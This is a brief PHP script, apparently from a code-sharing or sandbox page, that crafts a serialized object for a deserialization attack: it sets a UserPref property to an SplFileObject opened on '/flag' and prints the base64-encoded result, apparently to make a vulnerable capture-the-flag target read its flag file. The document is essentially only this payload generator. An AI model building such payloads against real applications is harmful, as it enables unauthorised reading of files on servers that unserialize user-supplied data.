<?php class UserPref { public $theme; public $lang; } $obj = new UserPref(); $obj->theme = new SplFileObject('/flag', 'r'); $obj->lang = "zh"; echo base64_encode(serialize($obj)); ?>
You have javascript disabled. You will not be able to edit any code.